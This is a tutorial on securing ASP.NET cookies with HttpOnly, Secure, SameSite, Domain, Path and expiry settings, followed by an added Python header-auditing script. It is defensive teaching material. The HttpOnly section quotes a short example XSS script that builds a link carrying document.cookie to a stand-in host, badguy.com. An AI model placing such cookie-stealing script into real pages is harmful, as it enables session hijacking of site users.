Securing Your Cookies

What are cookies?

HTTP cookies are used by websites to store stateful information about your visit. Name, address, SessionID and browsing history can all be stored as cookies in your web browser as key-value pairs. Most importantly, cookies can store your login token and other identifying information about your browsing session that you’d probably prefer to keep to yourself.

Cookies are set using the Set-Cookie HTTP Header in the response sent from a web server. The web browser then sends the appropriate cookies back to the server with each request. Most browsers accept cookies up to a size of 4096 bytes.

Why should you protect them?

Properly securing your cookies takes very little effort, which makes it a great idea when you factor in the added security it provides. Doing so can partially mitigate some of the most common web attacks.

How?

Securing your cookies is performed differently depending on the server-side platform you are using, but the basic theory behind it is the same for all platforms. Certain attributes can be applied to a cookie in the HTTP header, giving it different desirable properties. I will be demonstrating how to do so using ASP.NET.

HTTPOnly– This attribute prevents the cookie from being accessible from client-side scripts (JavaScript or VBScript). This is desirable as a defense against cross-site scripting attacks: it stops a malicious script from sending the cookie to a 3rd party. Here is an example of such a script using JavaScript:

<SCRIPT type="text/javascript">
var badGuy = 'www.badguy.com?=' + escape(document.cookie);
</SCRIPT>

Secure– This attribute ensures that the cookie can only be transmitted over an encrypted (HTTPS) connection. This prevents a malicious user performing a man-in-the-middle attack from stealing your SessionID or session information.

If you want to globally turn on these attributes for all the cookies in your ASP.NET application, the easiest way to do so is by adding the following lines to the ASP.NET web.config file. Element and attribute names in web.config are case-sensitive.

<system.web>
    <httpCookies httpOnlyCookies="true" requireSSL="true" />
</system.web>

SameSite– Recently Google Chrome introduced this new type of cookie that is aimed at preventing Cross Site Request Forgery attacks. It prevents the specified cookie from behaving as a 3rd party cookie, preventing an attacker from sending a modified cookie to your domain, which is a key part of a CSRF attack. The SameSite attribute can be set to either ‘strict’ or ‘lax’.

Domain– With this attribute you can specify whether the cookie should be sent from only one domain or from its sub-domains as well. Using the value “www.brendanmiller.net” will send the cookie only from the exact domain www.brendanmiller.net. Using “.brendanmiller.net” will send the cookie to all associated sub-domains as well. Depending on your setup, this may not be an issue, but you may want to restrict your cookie to only the appropriate sub-domains. This can be set by modifying the Domain property of your cookie in your C# code:

brendansCookie.Domain = "www.brendanmiller.net";

Path– The path attribute specifies which paths to send the cookie to. It is usually set to “/”, which sends the cookie to all paths within the domain, while using “/wiki/” would only send the cookie to files matching that route. This can be set by modifying the Path property of your cookie as follows:

brendansCookie.Path = "/App1";

Expiry– One more thing to consider is the persistence of the cookie. Cookies have an Expiry property that determines how long they last. If you want a cookie to only last for the duration of a session then leave the Expiry property blank. Otherwise set the property to a specific date and time. Keeping the expiry period as short as possible is a good security practice.

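Here is an example using C# of how to create a cookie and set its key properties:

// Requires: using System; using System.Web;
// otherStringValue is a string defined elsewhere in your code.
HttpCookie myCookie = new HttpCookie("MyCookie");
myCookie.Value = otherStringValue;
myCookie.Expires = DateTime.Now.AddDays(1);   // persist for one day
myCookie.Path = "/App1";                      // only sent to paths under /App1
myCookie.Domain = "www.brendanmiller.net";    // only sent to this domain
Response.Cookies.Add(myCookie);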
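
To confirm that these attributes actually reach the browser, you can audit the Set-Cookie headers your application emits. The Python script below is an added example, not part of the original article; the function names, the one-day lifetime threshold and the sample headers are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

MAX_LIFETIME = timedelta(days=1)  # assumed policy: persistent cookies live at most a day

def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, attrs); attribute names are lower-cased."""
    first, *rest = [part.strip() for part in header.split(";")]
    name = first.partition("=")[0].strip()
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name, attrs

def audit_cookie(header, now):
    """Return (cookie name, findings) for the attributes covered in this article."""
    name, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    if attrs.get("samesite", "").lower() not in ("strict", "lax"):
        findings.append("SameSite is not Strict or Lax")
    if attrs.get("domain", "").startswith("."):
        findings.append("Domain covers all sub-domains")
    if "expires" in attrs:  # no Expires means a session cookie, nothing to flag
        try:
            expires = parsedate_to_datetime(attrs["expires"])
            if expires.tzinfo is None:  # treat a zone-less date as UTC
                expires = expires.replace(tzinfo=timezone.utc)
            if expires - now > MAX_LIFETIME:
                findings.append("Expires is more than one day away")
        except (TypeError, ValueError):
            findings.append("Expires is not a valid date")
    return name, findings

# Constructed sample headers, not captured from a real site.
NOW = datetime(2025, 1, 1, tzinfo=timezone.utc)
WEAK = "SessionID=abc123; Domain=.brendanmiller.net; Path=/; Expires=Fri, 31 Jan 2025 00:00:00 GMT"
HARDENED = ("MyCookie=value; Domain=www.brendanmiller.net; Path=/App1; "
            "Expires=Thu, 02 Jan 2025 00:00:00 GMT; Secure; HttpOnly; SameSite=Strict")

if __name__ == "__main__":
    for header in (WEAK, HARDENED):
        name, findings = audit_cookie(header, NOW)
        print(name, "->", findings or "ok")
```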
